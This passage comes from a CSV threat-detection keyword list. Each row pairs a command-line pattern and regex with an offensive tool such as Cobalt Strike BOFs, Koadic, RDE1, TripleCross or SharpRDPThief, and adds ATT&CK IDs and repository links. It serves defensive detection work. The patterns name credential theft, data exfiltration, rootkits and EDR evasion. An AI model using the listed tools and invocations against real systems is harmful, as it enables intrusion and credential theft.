Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* pyasn1.*",".{0,1000}\spyasn1\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* PyClone.py*",".{0,1000}\sPyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "* pyLAPS.py*",".{0,1000}\spyLAPS\.py.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","0","N/A","9","1","60","11","2024-03-31T12:13:57Z","2021-10-05T18:35:21Z" "* pypykatz*",".{0,1000}\spypykatz.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* pyramid.py *",".{0,1000}\spyramid\.py\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "* pyrdp.mitm.*",".{0,1000}\spyrdp\.mitm\..{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "* python goldenPac *",".{0,1000}\spython\sgoldenPac\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* pywsus.py *",".{0,1000}\spywsus\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -q -r karma.rc_.txt*",".{0,1000}\s\-q\s\-r\skarma\.rc_\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* qconn-exec.nse*",".{0,1000}\sqconn\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* qscan.nse*",".{0,1000}\sqscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* quake1-info.nse*",".{0,1000}\squake1\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* quake3-info.nse*",".{0,1000}\squake3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* quake3-master-getservers.nse*",".{0,1000}\squake3\-master\-getservers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* QuickViewAD.ps1*",".{0,1000}\sQuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "* -r data/* -p * -m readfiles*portscan*",".{0,1000}\s\-r\sdata\/.{0,1000}\s\-p\s.{0,1000}\s\-m\sreadfiles.{0,1000}portscan.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2756","484","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "* radare *:* -ble*",".{0,1000}\sradare\s.{0,1000}\:.{0,1000}\s\-ble.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","351","52","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" "* RagingRotator.go*",".{0,1000}\sRagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "* rai-attack-dns*",".{0,1000}\srai\-attack\-dns.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "* rai-attack-http*",".{0,1000}\srai\-attack\-http.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "* --random_user_agent*",".{0,1000}\s\-\-random_user_agent.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* --random-agent *",".{0,1000}\s\-\-random\-agent\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* rarce.py*",".{0,1000}\srarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "* rasman.exe*",".{0,1000}\srasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "* -ratel *",".{0,1000}\s\-ratel\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* Rattler.exe*",".{0,1000}\sRattler\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "* Rattler_32.exe*",".{0,1000}\sRattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "* Rattler_x64.exe*",".{0,1000}\sRattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "* RBCD -action write -delegate-to * -delegate-from *",".{0,1000}\sRBCD\s\-action\swrite\s\-delegate\-to\s.{0,1000}\s\-delegate\-from\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "* rce.php /var*",".{0,1000}\srce\.php\s\/var.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "* RCE.py -*",".{0,1000}\sRCE\.py\s\-.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rde1 crde_windows*",".{0,1000}\srde1\scrde_windows.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* rde1 srde_linux*",".{0,1000}\srde1\ssrde_linux.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* rde1 srde_macos*",".{0,1000}\srde1\ssrde_macos.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* rde1 srde_windows*",".{0,1000}\srde1\ssrde_windows.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* rdp * -u * -p * --nla-screenshot*",".{0,1000}\srdp\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-nla\-screenshot.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* rdp-enum-encryption.nse*",".{0,1000}\srdp\-enum\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* RDPHook.dll*",".{0,1000}\sRDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "* rdp-ntlm-info.nse*",".{0,1000}\srdp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rdpv.exe*",".{0,1000}\srdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "* rdp-vuln-ms12-020.nse*",".{0,1000}\srdp\-vuln\-ms12\-020\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ReadFromLsass*",".{0,1000}\sReadFromLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* ReadPEInMemory.exe*",".{0,1000}\sReadPEInMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "* -RealCmdLine *",".{0,1000}\s\-RealCmdLine\s.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "* -RealCmdLine *",".{0,1000}\s\-RealCmdLine\s.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "* realvnc-auth-bypass.nse*",".{0,1000}\srealvnc\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rec2 crde_linux*",".{0,1000}\srec2\scrde_linux.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* rec2 crde_macos*",".{0,1000}\srec2\scrde_macos.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* received ACK from backdoor*",".{0,1000}\sreceived\sACK\sfrom\sbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*----------------- Recon & Enumeration Modules -----------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sRecon\s\&\sEnumeration\sModules\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* Redirect Url After Stealing ==> *",".{0,1000}\sRedirect\sUrl\sAfter\sStealing\s\=\=\>\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* redis-brute.nse*",".{0,1000}\sredis\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* redis-info.nse*",".{0,1000}\sredis\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* 